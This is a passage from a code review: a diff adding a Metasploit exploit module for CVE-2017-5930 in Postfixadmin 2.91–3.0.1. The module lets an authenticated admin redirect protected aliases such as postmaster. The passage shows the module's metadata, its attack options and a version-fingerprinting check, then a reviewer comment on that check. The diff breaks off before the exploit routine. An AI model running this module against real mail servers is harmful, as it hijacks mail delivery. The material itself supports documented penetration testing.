modules/exploits/unix/webapp/pfadmin_protected_alias.rb

```diff
@@ -0,0 +1,141 @@
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HTTP::PostfixAdmin
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Postfixadmin Protected Alias Deletion Vulnerability',
+      'Description'     => %q{
+        Older Postfixadmin versions do not check if an admin is allowed to delete
+        protected aliases. This vulnerability can be used to redirect protected aliases
+        to an other mail address. Eg. rewrite the postmaster@domain alias
+      },
+      'Author'          => [ 'Jan-Frederik Rieckers' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2017-5930'],
+          ['URL', 'https://github.com/postfixadmin/postfixadmin/pull/23'],
+          ['BID', '96142'],
+        ],
+      'Privileged'      => true,
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [[ 'Postfixadmin v2.91 - v3.0.1', {}]],
+      'DisclosureDate'  => 'Feb 03 2017',
+    ))
+
+    register_options(
+      [
+        OptString.new("USERNAME", [true, "The Postfixadmin username to authenticate with"]),
+        OptString.new("PASSWORD", [true, "The Postfixadmin password to authenticate with"]),
+        OptString.new("TARGET_ALIAS", [true, "The alias which should be rewritten"]),
+        OptString.new("NEW_GOTO", [true, "The new redirection target of the alias"])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def target_alias
+    datastore['TARGET_ALIAS']
+  end
+
+  def new_goto
+    datastore['NEW_GOTO']
+  end
+
+  def check
+    res = send_request_cgi({'uri' => postfixadmin_url_login, 'method' => 'GET'})
+
+    return Exploit::CheckCode::Unknown unless res
+
+    return Exploit::CheckCode::Safe if res.code != 200
+
+    if res.body =~ /<div id="footer".*Postfix Admin/m
+      version = res.body.match(/<div id="footer"[^<]*<a[^<]*Postfix\s*Admin\s*([^<]*)<\//mi)
+      return Exploit::CheckCode::Detected unless version
+      if Gem::Version.new("2.91") > Gem::Version.new(version[1])
+        return Exploit::CheckCode::Detected
+      elsif Gem::Version.new("3.0.1") < Gem::Version.new(version[1])
+        return Exploit::CheckCode::Detected
```

Comment:
As you can see in Line 74 the above code checks for Versions, that are not vulnerable, so Detected is the right behaviour here...